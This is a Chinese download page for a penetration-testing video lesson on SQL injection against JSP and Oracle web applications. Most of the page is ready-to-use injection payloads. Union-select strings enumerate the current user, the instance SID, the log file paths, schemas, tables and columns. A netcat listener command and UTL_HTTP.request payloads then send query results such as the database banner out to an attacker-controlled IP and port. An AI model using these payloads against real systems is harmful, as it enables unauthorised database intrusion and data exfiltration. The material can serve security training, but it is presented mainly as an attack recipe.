您现在的位置:圣剑网 >> 动画教程 >> 漏洞检测 >> 实战渗透测试第十课:利用UTL_HTTP存储过程+NC反弹注入
实战渗透测试第十课:利用UTL_HTTP存储过程+NC反弹注入
软件大小:14.0 MB
更新时间:2016-11-01 01:37
授权方式:共享版
人气访问:214次
运行环境:Windows All 32/64位
软件评级:
分享好友:
实战渗透测试第十课:利用UTL_HTTP存储过程+NC反弹注入介绍

讲师:巅峰邪恶

动画名称:渗透测试第十课   jsp+oracle注入  利用UTL_HTTP存储过程+NC反弹注入


6.获取当前数据库用户名


and  1=2  union select null,null,(select SYS_CONTEXT ('USERENV','CURRENT_USER') from dual) from dual


union select null,null,null,null,user,null from user_tables


7.通过查询日志文件绝对路径,判断操作系统


and 1=2 union select null,null,(select member from v$logfile where rownum=1) from dual


8.获取服务器sid


and 1=2 union select null,null,(select instance_name from v$instance) from dual


9.暴库名


and 1=2 union select null,null,(select owner from all_tables where rownum=1) from dual

暴出第一个库名


and 1=2 union select null,null,(select owner from all_tables where rownum=1 and owner<> '第一个库名') from dual


可以查出当前用户数据库中的所有数据库库名


10,获取表名


and 1=2 union select null,null,(select table_name from user_tables where rownum=1) from dual

暴出一个表名


and 1=2 union select null,null,(select table_name from user_tables where rownum=1 and table_name<>'第一个表名') from dual


11.获取字段名


and 1=2 union select null,null,(select column_name from user_tab_columns where table_name='表名' and rownum=1) from dual


可获取第一个字段


and  1=2  union  select  null,null,(select  column_name  from  user_tab_columns  where 

table_name='表名' and column_name<>'第一个字段' and rownum=1) from dual


获取全部字段


13.判断UTL_HTTP存储过程是否可用


and exists(select count(*) from all_objects where object_name='UTL_HTTP')

如果页面返回正常,则说明 UTL_HTTP 存储过程可以使用。


14.监听本地端口


nc -vv -l -p 端口


15.UTL_HTTP反弹注入


监听端口后,在注入点出提交如下查询:

and UTL_HTTP.request('http://本地 IP:端口号/'||(查询语句))=1


and  UTL_HTTP.request('http://192.168.131.102:55/'||(select banner from sys.v_$version where rownum=1))=1   读取数据库信息


and  UTL_HTTP.request('http://192.168.131.102:55/'||(select banner from sys.v_$version where rownum=1))=1

实战渗透测试第十课:利用UTL_HTTP存储过程+NC反弹注入下载地址
网友评论

关于圣剑 - 广告服务 - 招聘信息 - 友情连接 - 保护隐私权 - 意见反馈 - 帮助中心 - 联系我们

Copyright © 2016 Sjian.Net Inc. All Rights Reserved.大千网络科技有限公司 版权所有

不良信息举报中心 陕ICP备10005927号 陕公网安备61010402000003号